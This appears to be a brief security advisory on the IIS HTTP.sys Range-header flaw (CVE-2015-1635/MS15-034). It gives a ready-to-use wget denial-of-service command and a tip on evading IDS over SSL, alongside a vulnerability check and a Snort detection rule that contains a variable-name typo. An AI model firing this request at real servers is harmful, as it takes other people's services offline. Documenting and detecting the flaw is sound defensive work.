The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system.
Denial of Service (DoS) exploits are widely available to exploit CVE-2015-1635, a vulnerability in HTTP.sys, affecting Internet Information Server (IIS) . The patch was released on Tuesday (April 14th) as part of Microsoft’s Patch Tuesday.
CVE
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1635
KB Number 3042553
https://support.microsoft.com/en-us/kb/3042553
Summary
The vulnerability could allow remote code execution if an attacker sends a specially crafted HTTP request to an affected Windows system. The security update addresses the vulnerability by modifying how the Windows HTTP stack handles requests.
Attack Vectors
To exploit this vulnerability, an attacker would have to send a specially crafted HTTP request to the affected system.
Affected software Windows 7, Windows 8, Windows 8.1, Windows Server 2008 R2, Windows Server 2012, Windows Server 2012 R2
Also note this exploit works over SSL meaning it can used to bypass your IDS or other network protections.
DOS Exploit
Add the IP you desire to exploit where I have 127.0.0.1. Noted that this has to be a static file.
wget --header="Range: bytes=18-18446744073709551615" http://127.0.0.1/welcome.png
Results is the server is now unavailable.
Python Script to Test
Just change the IP inside the file and run within Python.
Results of the test.
Link to the file Link
Request Check
Send the following request to your IIS server:
GET / HTTP/1.1 Host: MS15034 Range: bytes=0-18446744073709551615
If the server responds with “Requested Header Range Not Satisfiable”, then you may be vulnerable. Results may be inconclusive as Erratasec has stated.
Snort Rule
alert tcp $EXTERNL_NET any -> $HOME_NET 80 (msg: ” MS15-034 Range Header HTTP.sys Exploit”; content: “|0d 0a|Range: bytes=”; nocase; content: “-“; within: 20 ; byte_test: 10,>,1000000000,0,relative,string,dec ; sid: 1001239;)
(byte_test is limited to 10 bytes, so I just check if the first 10 bytes are larger then 1000000000)